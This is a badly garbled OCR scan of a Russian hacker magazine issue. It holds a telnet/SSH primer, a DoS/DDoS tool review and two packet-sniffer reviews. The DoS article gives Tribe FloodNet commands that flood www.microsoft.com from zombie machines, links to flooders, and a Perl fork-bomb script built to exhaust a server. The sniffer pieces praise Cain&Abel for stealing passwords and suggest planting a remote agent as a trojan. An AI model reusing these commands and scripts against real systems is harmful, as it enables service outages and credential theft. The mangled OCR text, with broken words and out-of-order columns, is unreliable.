SSHPro: 3 балла 


Несомненно, в Инете ты можешь 
найти и другие, не менее крутые 
проекты. Но я не могу судить о них 
объективно, так как ни разу не ис- 
пользовал их в своей работе. Если 
ты не согласен с моей строгой оцен- 
кой, можешь подать апелляцию мне 
на мыло ;). С удовольствием рас- 
смотрю жалобу и отвечу на все ин- 


тересующие вопросы. _ 
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Все познается в 
сравнении, поэ- 
тому советую 
тебе попробо- 
вать SSHPro, и, 
возможно, он 
тебе понравится 
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КАК УПРАВЛЯТЬ СЕРВАКОМ УДАЛЕННО ИЗ LINUX 


Vitls (vitls@chat.ru) 


й-ой-ой... Отмахива- 

юсь от твоих размахи- 

вающихся ручонок. 
Да, да. Ты знаешь про такой прото- 
кол, как telnet, и даже, возможно, 
что-то слыхивал про такую шнягу, 
как ssh. Ну и что из этого? Да я 
твою голову даю на отсечение, что 
ты практически больше ничего про 
эти программы и не знаешь. 


ПРАДЕДУШКА TELNET 

Начну, пожалуй, с краткой истори- 
ческой справки. Telnet относится к 
группе самых древних протоколов 
управления удаленной системой. Он 
был разработан несколько десятков 
лет назад на заре развития сети 
АКРАМЕТ, ставшей "мамой" совре- 
менного Интернета. Именно в то 
время родилась идея использовать 


уже пару де- программу, которая позволяла бы 


2 Ss 
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протокола ТСР. Это только на пер- 
вый взгляд кажется, что кроме ус- 
тановления соединения с удален- 
ным сервером клиент telnet ничего 
не умеет. Если копнуть глубже, то 
тебе откроются совершенно неожи- 
данные вещи. Подробности ты мо- 
жешь посмотреть сам, прогуляв- 
шись по линку: http://www.omni- 
farious.org/~hopper/technical/tel- 
net-rfc.html. He удивлюсь, если ты 


Вам письмо! 


"порт" указывает, к какой сервис- 
ной службе подключаться. Подклю- 
чившись к telnet-cepBepy, ты сразу 
получаешь приглашение ввести 
имя пользователя и пароль. Коро- 
че, картинка та же самая, как если 
бы ты сам сидел за клавой далекой 
машины. Единственное, что тебя 
будет отрезвлять, так это более 
длительное время ожидания откли- 
ка на нажатие клавиши. Ну, это-то 


Но eae видеть экран удаленного компьюте- вдруг обнаружишь, ЧТО СКВОЗЬ ЭТОТ понятно, расстояние и дохлые ка- 
ры не ыы ра и посылать ему "нажатия" на протокол можно работать не толь- налы свою роль таки играют. 
пользуются. клавиатуру так, как если бы ты сам 


сидел за клавой удаленной машины. 
Для успешного использования 
данного протокола требуются две 
вещи. Сервер и клиент. Серверная 
часть (демон telnetd) выполняется 
на удаленном компьютере (хост- 
сервер), которым требуется управ- 
лять. Клиентская программа назы- 
вается... угадай с трех раз, пра- 


Telnet относится к группе самых древних 
протоколов управления удаленной 
системой. Он был разработан несколько 
десятков лет назад на заре развития 
сети ARPANET, ставшей "мамой" 
современного Интернета 


вильно, telnet - и выполняется на 
твоем компьютере (хост-клиент). 
Она имеет и свой набор команд, ко- 
торые управляют, собственно, этой 
программой и сеансом связи, его 
параметрами, открытием новых сес- 
сий, закрытием и т.д. Эти команды 
подаются из командного режима 
telnet, в который можно перейти, 
нажав так называемую езсаре-пос- 
ледовательность клавиш, которая 
тебе сообщается в начале сеанса. 
Традиционно это Ctrl-]. Эту nocne- 
довательность можно переопреде- 
лить по своему усмотрению в кома- 
наном режиме. Читай man telnet go 
полного просветления. 

Telnet является протоколом прик- 
ладного уровня. То есть все сооб- 
щения для управления хост-серве- 
ром и удаленным терминалом пере- 
даются при помощи транспортного 
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ко в текстовом режиме, но и запус- 
кать удаленные графические при- 
ложения. Возможности протокола 
telnet описывают десятки различ- 
ных документов RFC (Request For 
Comment). 


ЮЗАЕМ В ЛИНЕ 
И серверная (вдруг тебе потребует- 
ся), и клиентская программы явля- 
ются практически неотъемлемой 
частью любого дистрибутива Linux. 
В моем ALT Linux Master 2.2 постав- 
ляются два пакета: telnet и telnet- 
server. Не думаю, что у тебя воз- 
никнут проблемы с установкой. 
Подключение (установление сес- 
сии) производится крайне просто: 
командой telnet адрес [порт], где 
адрес - IP-agpec удаленной систе- 
мы, а необязательный параметр 


Также хочу сказать, что уже пару 
десятков лет telnet-cepBepbl не ис- 
пользуются. Причиной этого стала 
абсолютная незащищенность про- 
токола перед атаками типа тап-т- 
middle (третий в кровати). Грубо ro- 
воря, если тебя снифофают, прослу- 
шивают твой трафорик, то все пе- 
редаваемые данные доступны 3no- 
умышленнику. | 

Тем не менее telnet можно ис- 
пользовать для имитации клиен- 
тской программы при подключении 
к удаленному сетевому сервису. На 
скрине показано использование 
{ете{-клиента для имитации рабо- 
ты почтового клиента. | 


ОТКУДА ВЗЯЛСЯ SSH? 
Недостатки в безопасности можно | 
обойти, если шифровать траффик 


между сервером и клиентом. Не мы 
одни такие умные, и спецификации 
безопасного шелла (secure shell) 
под названием ssh были опублико- 
ваны в соответствующем докумен- 
те rfc 
(http://www.free.|p.se/fish/rfc.txt). 

В настоящий момент широко изве- 
стны две реализации протокола. 
Одна из них делается коммерчес- 
ким предприятием SSH 
Inc.(http://www.ssh.com) и закрыта, 
хотя программа бесплатна для не- 
коммерческого использования. Вто- 
рая реализация поддерживается 
проектом OpenSSH 
(http://www.openssh.org), ucxog- 
ные тексты которого открыты и ли- 
цензионно свободны. Обе реализа- 
ции совместимы друг с другом. Кли- 
ент из пакета проекта OpenSSH 
вполне прекрасно работает с серве- 
ром из поставки компании SSH Inc. 

Протокол существует в двух вер- 
сиях, несовместимых друг с другом. 
Это означает, что клиент версии 
sshl не будет работать с сервером 
ssh2 и наоборот. Это связано с ис- 
пользованием разных алгоритмов 
шифрования траффика и измене- 
ниями в процедуре установления 
сессии. В версии sshi были обнару- 
жены недостатки как в алгоритмах 
шифрования, так и в программах. 
Знаменитый эксплоит SSHNuke про- 
тив sshi был использован Тринити 
в фильме Матрица-2. Tak как sshi 
практически нигде не применяется, 
дальнейшее мое повествование бу- 
дет касаться программ версии $$12. 

Свободная и коммерческая реали- 
зации ssh2 содержат практически 
одинаковый набор программ. При- 
веду некоторый список: 

sshd - серверная часть (демон), 
запускаемая на сервере. Прослу- 
шивает соединения от клиентских 
машин и при установлении связи 
производит аутентификацию и на- 
чинает обслуживание клиента. 

ssh - программа клиент, использу- 
емая для входа на удаленную ма- 
шину или для выполнения команд 
на другой машине. 

scp - секретное копирование фай- 
лов с одной машины на другую. 

ssh-keygen - используется gna 
создания RSA ключей машины и 
пользователя (host keys and user 
authentication keys). 

ssh-agent - программа автомати- 
зации аутентификации. Она может 
быть использована для хранения в 
памяти ключей для аутентифика- 
ЦИИ. 

ssh-add - используется для реги- 
страции новых ключей с агентом. 

sftp - защищенный клиент ftp. 
Серверная часть обеспечивается 
демоном sshd. 


ПОСТРОИТЬ И НАСТРОИТЬ! 
Установка коммерческой версии 
$512 особых проблем не доставля- 


ЗОЕТ/ДЛИННЫЕ РУКИ ПРАВИЛЬНОЙ ОС 


ет. Ты скачиваешь архив в удоб- 
ном для тебя формате, устанавли- 
ваешь его и приступаешь к наст- 
ройке. Процедуру установки сво- 
бодного openssh тоже расписывать 
нет особой нужды. Если у тебя есть 
опыт самостоятельной сборки и ус- 
тановки приложений Linux, openssh 
тебя не испугает. Опять же боль- 
шинство дистрибутивов Linux 
включают Openssh в комплект, тебе 
останется лишь установить его. 
Как бы то ни было, при работе с 
ssh у тебя 100% возникнет ряд воп- 
росов. Отвечаю сразу на несколько. 
В отличие от telnet при работе ssh 
соединение зашифровывается Cpa- 
зу после подключения клиента к 
серверу. Алгоритм шифрования RSA 
не требует секретности ключа для 
шифрования. Секретным должен 
быть ключ для расшифровывания, а 
он всегда остается на стороне серве- 
ра, и перехватить его невозможно. 
Для увеличения безопасности со- 
единения можно настроить аутен- 
тификацию пользователя на сер- 
вере не по системному паролю, а 
по ключевой фразе. Для этого те- 
бе нужно будет сгенерировать па- 
ру ключей: открытый (публичный) 
и секретный (man ssh-keygen). Отк- 
рытый ключ можно распространить 
на те клиентские рабочие места, с 


Совокупляемся no SSH 


которых ты будешь заходить Ha 
сервер. И для openssh, и для ssh 
процедура генерирования и ис- 
пользования ключей практически 
одинакова. Различия лишь в име- 
нованиях файлов и каталогов. Под- 
робнее об этом ты можешь про- 
честь в моем переводе руковод- 
ства no ssh по адресу: 
http://www.linux.ru.net/index.php? 
module=library&action=show&doci 
d=196&part=1849. Также очень 
много расписано тут - 
http://www.opennet.ru/base/sec/la 
vr-ssh.1.txt.html и тут - 
http://www.opennet.ru/docs/RUS/ 
ssh_fag/ssh-faqr.html#toc. Оба 
этих документа расскажут тебе о 
принципах работы ssh и дадут 
практический материал. 

Успешно установленный и наст- 
роенный пакет на сервере даст те- 
бе возможность работать точно так 
же, как если бы ты использовал 
telnet. Ощущение того, что ты за 
клавой, просто потрясающее. На 
скрине показан процесс соедине- 
ния с удаленной машиной, на кото- 
рой работает ssh-cepBep. 

Так как мой клиент ни разу go 
этого с этой машиной не соединял- 
ся, сервер предложил мне свой 
открытый ключ и спросил, продол- 
жать ли мне соединение. Ответив 
"ДА", я сохранил ключ. С этого мо- 
мента КАЖДЫЙ передаваемый 
мной байт будет шифроваться этим 
ключом. Причем клиентская прог- 
рамма это делает сама. Так как у 
меня нет заранее сгенерированной 
пары ключей, то мне пришлось на 
сервере вводить свой системный 
пароль. Кроме того, на сервере ра- 
ботает коммерческий ssh, а на кли- 
енте - Openssh. Такие вот дела. 

Надеюсь, что теперь ты в курсе, 
как можно сидеть дома и безопас- 
но рулить серверами, которые на- 
ходятся от тебя хрен знает за 
сколько километров. Учись! 
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Недостатки в 
безопасности 
можно обойти, 
если шифро- 
вать траффик 
между сервером 
и клиентом. 
Спецификации 
безопасного 
шелла (secure 
shell) под наз- 
ванием ssh бы- 
ли опубликова- 
ны в соответ- 
ствующем rfc 


уречу 950 


ЗОЕТ/ЗАРОЗИМ ВСЕ, ЧТО 


ВИЖЕТСЯ! 


Обы 4hack 


DoS расшиф- 
ровывается как 
Denial Of 
Service, a DDoS 
- Distributed 
Denial Of 
Service. По-рус- 
ски это будет 
звучать как 
"Отказ в обслу- 
живании"' и 
"Распределен- 
ный отказ в 
обслуживании" 
соответственно 


Таблица про- 
цессов не рези- 
новая :), Запол- 
няя ее до пре- 
дела, мы тем 
самым нанесем 
огромный урон 
системным ре- 
сурсам сервера 


раде 


то отнюдь не добрый 

дедушка DOS, порож- 

денный прадедушкой 
Биллом :), все намного серьезнее. 
3a DOS ты можешь поплатиться 
рублем и даже лишиться свободы. 
Хочешь узнать почему? Тогда чи- 
тай дальше! 


ЧТО НАМ СТОИТ 

000$ УСТРОИТЬ? 

Буду краток. DoS расшифровывает- 
ся как Denial Of Service, a DDoS - 
Distributed Denial Of Service. No- 
русски это будет звучать как "От- 
каз в обслуживании" ("Распреде- 
ленный отказ в обслуживании"). 
Отказ вызывается принудительно 
со стороны недоброжелателя. Рас- 
смотрим пример: на тачке А уста- 
новлен ЕТР-сервер, которым поль- 
зуется много людей. В другом полу- 
шарии проживает хакер Вася, кото- 
рому по какой-либо причине не 
понравился ЕТР-сервер на тачке А. 
Поэтому, используя тачку В и не- 
кую программу С, он долго и упор- 
но флудит (льет тонны мусора) 
FTP-cepBep, пока тот не перестанет 
удовлетворять желания своих кли- 
ентов (никаких пошлых мыслей! ;)). 
Этим сценарием мы кратко описали 
принцип Dos. 

Организация DDOS не намного от- 
личается от вышеописанного. Все 
отличие в том, что для флуда забу- 
горных серваков используется не 
один, а несколько серверов (отсю- 
да и термин "Распределенный"). 
Как ты понял, программы gna орга- 
низации DdoS могут отличаться от 
софта gna DoS, более того, запус- 
тить поток флуда можно всего од- 
ной командой с любого сервера, 
ибо софт для упрощения жизни ха- 
кера еще не перевелся ;). 

Любой вид атаки поддается клас- 
сификации. DoS не исключение. 
Вот два основных класса отказа в 
обслуживании, которые могут 
иметь место: 

1. Забивание канала на сервере. 
Пожалуй, самый любимый способ 
для хакеров. Тут большого ума не 
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ЗАООЗИМ BCE, 
ЧТО ДВИЖЕТСЯ: 


ОБЗОР СОФТА ДЛЯ DOS 
АТАК В ПРАВИЛЬНОЙ ОСИ 


Докучаев Дмитрий 
aka Forb (forb@real.xakep.ru) 


надо. Берется сервер (или несколь- 
ко серверов) с большим каналом, 


на которых запускается вредонос- 
ная программа. Эта софтина шлет 
кучу мусора на сервер-жертву, тем 
самым забивая его пропускную 
способность. Если общий канал 
флудера в несколько раз превысит 
канал жертвы, то сервер потеряет 
связь с внешним миром до прекра- 
щения атаки. 

2. Выведение сервиса из строя. 
Помнишь пример с ЕТР-сервером? 
Задача хакера была убить отдель- 


ную службу. Для этого дела суще- 
ствует много софта, который мы 
рассмотрим чуть ниже. 


СМЕРТЕЛЬНЫЙ СОФТ 

Самая важная проблема для недоб- 
рожелателя - выбор программ для 
атаки. С учетом того, что в Инете их 
развелось великое множество, этот 
выбор достаточно сложен. Рассмот- 
рим несколько программ с разными 
задачами, чтобы максимально ярко 
осветить возможности DOS. Весь 
софт был успешно обкатан в пра- 
вильной оси, поэтому работу под 
Виноой я не гарантирую (но флу- 
дить Форточки он будет с удоволь- 
ствием ;)). 


TFN2K = УНИВЕРСАЛЬНЫЙ 
DDOS-EP 

Итак, первая программа из моего 
обзора - Tribe FloodNet. Уникаль- 
ность сей сосфтины в TOM, что это 
не что иное, как средство для 
масштабного ОБо5-инга. Прога сос- 
тоит из клиента и сервера. Сервер 
запускается на зараженных (или 
зомбированных) машинах и тихо 
ждет приказа со стороны клиента. 
После запуска клиента с нехитры- 
ми параметрами всем серверам пе- 
редаются вводные данные от поль- 
зователя. Затем начинается сброс 


Выбери один из десяти уникальных параметров DDoS 


Stream3 - самый лучший DoS-ep 


мусора на сервак-жертву. Как ты 
понимаешь, чем больше зомби (а 
соответственно и канал на этих 
серверах), тем больше вероятность 
успешного флуда машины. 

Для запуска сервера-демона осо- 
бого ума не надо. Просто стартуй 
бинарник td без параметров. С кли- 
ентом сложнее. Он имеет ряд обя- 
зательных параметров, которые ты 
должен указать. К примеру, строка: 


/tfn -Р tcp -h 127.0.0.1 -i www.microsoft.com -c 4 


будет флудить MicroSoft UDP-no- 
током данных (параметр -с обозна- 
чает тип флуда). Этот случай при- 
меним, если сервер установлен на 
локальной машине. В случае, если 
ты зазомбировал несколько серва- 
ков и желаешь, чтобы они прини- 
Manu участие во флуде, необходи- 
мо составить список р-адресов за- 
раженных машин и упаковать их в 
файл (например, hosts). После это- 
го командуй: 


./tfn -Р tcp -f ./hosts -i www.microsoft.com -c 4 

Вот, другое geno! Сервер ушел в 
даун ;). И все благодаря твоей не- 
большой смекалке и стараниям по 
зомбированию тачек. Пора бы уж 
смилостивиться над Майкрософтом 
и прекратить флуд. Это можно сде- 
лать командой: 


/tfn -P tcp -f ./hosts -i www.microsoft.com -c 0 


тем самым отменив любой флуд 
на заданный сервер. 

Если запустить клиент без пара- 
метров, ты сможешь узнать все ти- 
пы флуда (их 10) и выбрать самый 
оптимальный gna тебя =). 

Скачать этот DDOS-ep можно по 
адресу: http://packetstormsecuri- 
ty.nl/distributed/tfn2k.tgz. 


STREAM3.C = | 
ЭФФЕКТИВНЫЙ DOS-EP 
Следующей программой будет cocpTu- 
на от ЗАРАЗА (я думаю, ты знаешь, 
кто этот человек). Этот ДоС-ер cpny- 
дит сервер FIN/ACK пакетами, в pe- 
зультате этого флуда он впадает в 
депрессию и не отвечает на запросы. 


ЗОЕТ/ЗАРОЗИМ ВСЕ, ЧТО ДВИЖЕТСЯ! 


Кладем виндовый smbd ;) 


Но если твой канал маленький, то от- 
каз в обслуживании понесешь ты из- 
за действительно мощного потока 
срлуда. DoS-ep, как ты наверное по- 
нял, написан на С. В нем нет ничего 


заумного: структуры сокетов, попытка 
cnyqpa source ip и source port и беско- 
нечный цикл отправки мусора Ha сер- 
вер-жертву :), после чего сервер пос- 

лушно впадает в зимнюю спячку. 

Этот флудер также может быть 
пригоден и для DDoS. Тебе лишь 
необходимо запустить несколько 
бинарников одновременно (на раз- 
ных шеллах). В параметрах stream3 
тебе нужно указать ip-agpec жерт- 
вы, порт, поддельный ip-agpec и 
поддельный порт (при опускании 
двух последних параметров они бе- 
рутся случайным образом). 

На данный момент у stream3 нет 
конкурентов, поэтому он пользует- 
ся огромной популярностью в кру- 
Гу хакеров. 

Сливаем флудер с сайта произво- 
дителей: 
http://www.security.nnov.ru/files/s 
tream3.c. 

А ДЛЯ WINDOWS? 

Если ты внимательно читал теорию 
DoS, то помнишь, что можно прину- 
дительно остановить отдельные 
сервисы и для этого не надо уби- 
вать весь сервер. Следующей прог- 
раммой будет популярный smb- 
пике. ДоС-ер стремится вывести из 
строя виндовый сервис SMB, при- 
чем делает это довольно успешно. 
Посылая кривые пакеты на 139-й 
порт удаленной тачки, нюкер пол- 
ностью убивает сервис. Причем, 
уязвимой системой является не 
Win95 (как ты, наверное, подумал), 
а новые серьезные операционки: 


Windows МТ 4.0 
Workstation/Server 

Windows 2000 
Professional/Advanced Server 

Windows XP Professional/Home 
edition. 

Взять smbnuke можно отсюда: 
http://packetstormsecurity.n|/DoS/ 
smbnuke.c. 


Ограничимся лишь проверкой Ha синтаксис ;) 


ЛОКАЛЬНЫЙ 00$ 
Самым легким способом вывода из 
строя правильной оси является ло- 
кальный флуд. Причем для выпол- 
нения задачи нам не нужны root- 
права, ведь администраторы прак- 
тически никогда не ставят лимиты 
на процессы обычным юзерам ;). 
Этим недостатком мы и воспользу- 
емся. Зачем пользоваться чужим 
софтом (которого очень много), да- 
вай напишем свой первый локаль- 
ный DoS-ep. Для этого нам потребу- 
ется минимальное знание програм- 
мирования (к примеру, языка Perl). 
Таблица процессов не резиновая 
:). Заполняя ee до предела, мы тем 
самым нанесем огромный урон сис- 
темным ресурсам сервера (особен- 
но, если каждый подпроцесс будет 
активно кушать память сервака). 
Напишем простенькую программу, 
которая будет создавать бесконеч- 
ное число потомков. Потомки, в свою 
очередь, будут запускать какое-либо 
ресурсоемкое системное приложение 
(например, ping localhost ;)). 
Создание потомка в Perl npoucxo- 
дит в точности, как и в Си. Но не 
будем утруждать себя теорией, а 
перейдем сразу к кодингу: 


#1/usr/bin/perl 

print "Local DoSer by Xakep SPEZ 
started!\n": #4 Ham не прожить без рекламы :). 
while(1) { + Уходим в бесконечный цикл 
unless(Spid=fork()) { ## Создаем потомок 
system("ping localhost"); — НИ врубаем 
пингомет 


} 


Все! Софтина готова! Запусти ее в 
бэкграунд и скажи серверу: "До 
свидания!" :). При отсутствии лими- 
тов на процессы ему поможет толь- 
ко ребут. 


THE FINAL CHORD 

Вот и весь обзор. Поверь, я старал- 
ся охватить все стороны темного 
мира DoS и DDoS, указав основные 
типы софта для флуда. Хотя флуд 
можно совершить без подручных 
средств, обычным ping'om, запустив 
его с флагом -f (запрещение cppar- 
ментации пакетов), тем самым уро- 
нив сервер бесконечными ICMP- 
запросами. Если ты дружишь с 
языками программирования, то для 
тебя не составит труда написать 
свой ДоС-ер, который будет поли- 
вать грязью множество машин. Как 
говорится, было бы желание, а ос- 
тальное приложится... 
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Как ты пони- 
маешь, чем 
больше тачек- 
зомби (а соот- 
ветственно и 
канал на этих 
серверах), тем 
больше веро- 
ятность ус- 
пешного флу- 
да машины 


Посылая кри- 
вые пакеты на 
139-й порт 
удаленной 
тачки, нюкер 
полностью 
убивает сер- 
вис. Причем 
уязвимой сис- 
темой являет- 
ся не Win95 
(как ты, на- 
верное, поду- 
мал), а ХР и 
двухтысячник 


Уречу 1950 


ЗОЕТ/ЗАНЮХИВАЕМ В ОКОШКАХ 


Обы 4hack 


Windump (win- 
dump.polito.it) и 
Ettercap (etter- 
cap.source- 
forge.net) - это 
порты извест- 
ных консоль- 
ных *nix сниф- 
феров. 


Про WinPcap 
можно почитать 
на www.chere- 
povets- 
city.ru/inse- 
cure/reading/pap 
ers/bpf_unix.htm 


page 


ЗАНЮХИВАЕМ 
В ОКОШКАХ 


ОБЗОР СНИФФЕРОВ ПОД WINDOWS 


Kirion (Kirion@winfo.org) 


ебе не обязательно 

ставить правильную 

ось, для того чтобы 
мониторить трафоик, хорошие 
снифореры есть и для окошек :). 


PACKET CAPTURE LIBRARY 

Tak уж сложилось, что Винды с Ca- 
мого начала развивались как чисто 
пользовательская система. О хоро- 
шей работе в сетях, видимо, не 3agy- 
мывались. И даже с выходом первой 
МТ ничего сильно не изменилось. 
Какая работа с пакетами? Вы что! У 
нас даже нормального стека TCP/IP 
нет :). Ау Unix была архитектура 
Berkley packet filter, которая позво- 
ляла на уровне ЯДРА работать с па- 
кетами. Слава Bory, Упх-систем мно- 
го и не у всех есть архитектура ВРЕ 
:). Для остальных систем (в том чис- 
ле и для большинства реализаций 
Linux) была создана архитектура 
РСАР, которая тоже позволяла ус- 
пешно работать с пакетами, но уже 
на пользовательском уровне (а вы- 
полнена она была уже в виде драй- 
веров). Совместимость технологий 
обеспечивала общая библиотека 
Libcap, с которой непосредственно 
работали приложения. Но ведь драй- 
вер и библиотеку можно перенести 
на другую систему, правда :)? Так по- 
явилась библиотека WinPcap, позво- 
ляющая реализовать множество не- 
доступных ранее функций, в том 
числе и написание снифоферов. Сра- 
зу же появились порты популярных 
прх-снифоферов, начали появляться 
и чисто виндовые разработки. Мно- 
гие из них уже не требуют для рабо- 
ты WinPcap, однако все же советую 
скачать ее с winpcap.polito.it. Качать 
надо версию не младше 2.3, а если у 
тебя мультипроцессорная система 
(ну мало ли :)) или новомодный пень 
с технологией Hyper-Threading, то 
качай 3.0 (она как раз не очень дав- 
но зафиналилась). Ну, с теорией за- 
кончили, перейдем к прогам. 


IRIS 

www.eeye.com 
На момент написания статьи самая 
свежая версия была за номером 4.06. 
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Iris - один из лучших снифферов nog Win 


С сайта можно скачать только демон- 
страционную версию. Пришлось нем- 
ного покопаться в сети :). Кстати, ли- 
цензионный ключ прога проверяет 
при каждом запуске в Инете: советую 
настроить фаерволл :). Будем счи- 
тать, что ты со всем справился, и пос- 
мотрим, наконец, на прогу вблизи. 
Скажу сразу, что это один из лучших 
виндовых снифферов. Кнопочек и 
менюшек довольно много, но не пу- 
гайся - как в настоящей виндовой 
проге, половина из них дублирует 
друг друга :). ИМХО, лучше всего 
пользоваться кнопками слева - там 
все удобно разбито по разделам. 
Юзать прогу предельно просто: 
лезем в фильтры и задаем нужные 
параметры (а не то утонешь в паке- 
тах, особенно в большой сети). Оп- 
ций там много: IP и МАС адреса, 
порты, типы пакетов, ключевые сло- 
ва и Пех-последовательности. Есть 
и несколько готовых фильтров типа 
для почты, http, ftp и других станда- 
ртных сервисов. Данные можно 
сразу писать в логи (как в виде па- 
кетов, так и в раскодированном ви- 
ge). Все. Жмешь "Play", а когда на- 
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берется достаточно пакетов, клаца- 
ешь "Decode". Ириска раскидает na- 
кеты по сессиям, сгруппирует по ag- 
ресу, и можно будет посмотреть, 
что куда передавалось. 

Фича под название Guard - это 
тот же монитор подключений, толь- 
ко более глобальный: он следит не 
только за твоим компом, но и за 
всей подсетью (для админов может 
быть полезно). 

На основе полученных при захвате 
данных специально для любозна- 
тельных Iris может создавать раз- 
личные типы графиков и отчетов 
(мне, например, было интересно, кто 
больше всех флудит мою сеть :)). Hy 
и для реальных челов есть возмож- 
ность самому создавать и отсылать 
пакеты. Если интересно, учи прото- 
колы и станешь digital god :). Hy, и 
для самых хозяйственных есть пла- 
нировщик заданий. 


COMMVIEW 4.0 

www.tamos.com 
Еще один отличный сниффер, к то- 
му же с русским интерфейсом (выс- 
тавляется в настройках)! На сайте 
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CommView - почетное второе место :) 


компании есть еще пара очень лю- 
бопытных прог: CommView for WiFi 
- сниффер, заточенный под бесп- 
роводные сети (никто не хочет еще 
немного позаниматься варчоком?), 
и Сотт\Мем/ remote agent - прога, 
создающая что-то вроде моста для 
снифофинга между сетями. То есть 
в локалке стоит remote agent и пе- 
редает все данные на сервер 
(обычный сниффер CommView). 
Открываются неплохие горизонты, 
правда? Особенно, если remote 
agent можно было бы закинуть в 
виде трояна :). Тем более что 
CommView можно запустить в ре- 
жиме невидимки (cv.exe hidden, в 
Win2k/XP, естественно, виден в 
процессах). Чтобы приконнектить- 
ся к удаленному агенту, зайди в 
File>Remote Monitoring Mode. Кста- 
ти, если тебе вдруг просто понадо- 
билось перенаправить куда-нибудь 


а = авы Зы 
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Cain&Abel. Тулза для мегакулхацкеров :) 


тишь нужные пакеты, можно даже 
присылать алярму на мыло :)). 
Реализован в проге и генератор 
пакетов (по-моему, удобнее, чем в 
Iris), и раздел статистики с генера- 
тором отчетов (отчет можно генери- 
ровать на русском!). Ну и на всякий 
случай - база NIC по производите- 
nam сетевух и простой шедулер. 


CAIN&ABEL 2.5 BETA 
www.oxid.it 
Ничего название, ga ;)? Abel - это 
МТ-сервис, представляющий собой 
удаленную консоль для Сат (фишку 
со снифорингом удаленного Tpacp- 
фика обещают включить позже). А 
Cain... это не просто снифорер. Это 
весьма мощная и многофункцио- 
нальная тулза для взлома. Зачем за- 
морачиваться с раскодировкой паке- 
тов - нам пароли сразу выдают :). А 
еще есть такая фишка, как АБР poi- 


Для Винды есть библиотека WinPcap, 
позволяющая реализовать множество 
доступных только *тх'ам функций, в TOM 
числе и написание снифоферов. 


данные из сниффера (например, в 
другое приложение), можно обой- 
тись и без агента. Загляни в раздел 
Exchanging Data with Your 
Application MaHyana. 

CommView поддерживает работу 
из командной строки, хотя визуаль- 
ный интерфейс у него простой и 
удобный. На одной закладке выво- 
дятся все соединения, на другой - 
все пакеты. Правда, мне не понра- 
вилось, что показывается только 
пех-содержимое пакета и его свой- 
ства, а для того чтобы посмотреть 
содержимое сессии в человеческом 
виде, придется выбрать нужный па- 
кет и в контекстном меню кликнуть 
"Reconstructing TCP Sessions". В Iris 
это сделано удобнее. 

Естественно, можно задать 
фильтры (здесь они называются 
правилами), причем есть возмож- 
ность вешать фильтр даже на фла- 
ги ТСР. Имеются и универсальные 
формулы, построенные на логичес- 
ких выражениях. А еще в 
CommView реализован достаточно 
навороченный механизм Npegyn- 
реждений (если все правильно 
настроить, ты никогда не пропус- 


son routing, позволяющая снифофать 
на свичах! (Для тех, кто в танке: ха- 
бы посылают пакеты всем, поэтому 
снифорать легко, свитчи же посыла- 
ют пакеты на конкретный адрес.) На 
сайте даже есть флэшка, описываю- 
щая эту технологию :) 
(http://www.oxid.it/downloads/apr- 
intro.swf). A увидел закладочки 
под названием "ARP-SSH" и "АКР- 
HTTPS", и мне стало плохо. Если 
это еще и работает :)... Но если те- 
бе нужен снифеер как тулза для 
диагностики сети, придется, види- 
мо, искать что-нибудь другое. А вот 
если тебе нужно "спереть паролей, 
да побольше :)" - в самый раз. Тем 
более что прога еще и многофунк- 
циональный взломщик паролей: от 


Сделайте же кто-нибудь нормальный ин 
терфейс к этой замечательной проге! 


pwl и LM-hash go такой экзотики, 
как Cisco PIX и VNC. Минусов у про- 
ги всего два, но достаточно серьез- 
ные. Во-первых, это бета и не все 
функции еще работают. А во-вто- 
рых, документацию обещают сде- 
лать только к выходу финальной 
версии. А без доков порой пробле- 
матично разбираться :(. 


ПЕРЕБЕЖЧИКИ 

А теперь поговорим немного про 
Win32 порты известных никсовых 
снифферов. Первым у нас будет 
Ethereal (www.ethereal.com). Долго 
я думал, почему при таком уродском 
интерфейсе и, в общем-то, не впе- 
чатляющей функциональности он 
весит 10 мегов? К тому же непонят- 
ные тормоза при определении имен 
хостов. Ну да, мы умеем захваты- 
вать траффик. И даже расшифро- 
вывать. И даже строить некрасивые 
черно-белые графики, и даже выда- 
вать кое-какую статистику. Только 
зачем это все нужно под Винды? Ну 
разве что ради бесплатности (GNU, 
как никак). Windump (windump.poli- 
to.it) и Ettercap (ettercap.source- 
forge.net) - это консольные проги. 
Дальше продолжать :)? Windump - 
это порт ТерВитр весьма простого 
консольного снифорера. Тут тебе 
придется по полной мучаться с клю- 
чами командной строки и прочим. А 
вот Ettercap - это уже намного инте- 
реснее. Хоть прога и консольная, у 
нее есть интерактивный режим (те- 
бе не придется мучаться с флага- 
ми). Более того, в Ettercap есть APR 
(см. выше), возможность снифорать 
криптованный трафорик (с некото- 
рыми ограничениями). Кроме того, 
можно сканировать хосты и опреде- 
лять версию ОС. Есть и поддержка 
плагинов. Эх, был бы еще и нор- 
мальный интерфейс... 


GOTO TESTING? 

Вот вроде и все проги, которые я 
нарыл в сети за пару часов :). Есть, 
конечно, и другие (ZxSinffer, 
NetSniffer, etc), но эти показались 
мне наиболее интересными. Ну, а 
теперь самое время перевернуть 
страницу и приступить к тестирова- 
нию в условиях, приближенных к 


боевым :). 
a 
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Если пользу- 
ешься сниффе- 
рами - не за- 
бывай качать 
свежую версию 
WinPcap с 
winpcap.polito.it 


Пока He выш- 
ла документа- 
ция для 
Cain&Abel, мо- 
жешь почи- 
тать РАО на 
www.oxid.it/ 
cain_faq.html 
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СНИФФАЕМ НА 


ПРАВИЛЬНОЙ ОСИ 


ВЫБЕРИ СЕБЕ ЛУЧШИЙ СНИФФЕР 


Ушаков Андрей 
aka A-nd-Y (Andy_@timus.ru) 


Если ты решил 
всерьез занять- 
ся изучением 
сетевых прото- 
колов, рекомен- 
дую начать с 
TCP/IP, глянь на 
http://docs.can- 
tata.kiev.ua/net- 
working/TCP/, 
здесь ты най- 
дешь много по- 
лезной инфы 


Дополнительну 
ю инфу по 
снифферам, 

а также другим 
сетевым 
примочкам 

ищи на сайте 
http://www.i2r.ru 


page 


сли же ты до сих пор 
не знаешь, что это та- 
кое, то для начала 

несколько слов о том, что такое 

снифоер и как он работает. 


ХУ ИЗ ФАКИН СНИФФЕР? 
Снифоер - программа, позволяю- 
щая просматривать пакеты, прохо- 
дящие через сетевой интерфейс (в 
Linux это ppp, eth, lo). 

В случае ppp (модемное соедине- 
ние) ты просто будешь видеть все 
пакеты, которые прошли от тебя (к 
тебе) до провайдера. 

Если же твой комп находится в 
локалке, то твой интерфейс навер- 
Haka eth. В нормальном режиме се- 
тевая карта принимает пакеты, 
предназначенные только для нее, 
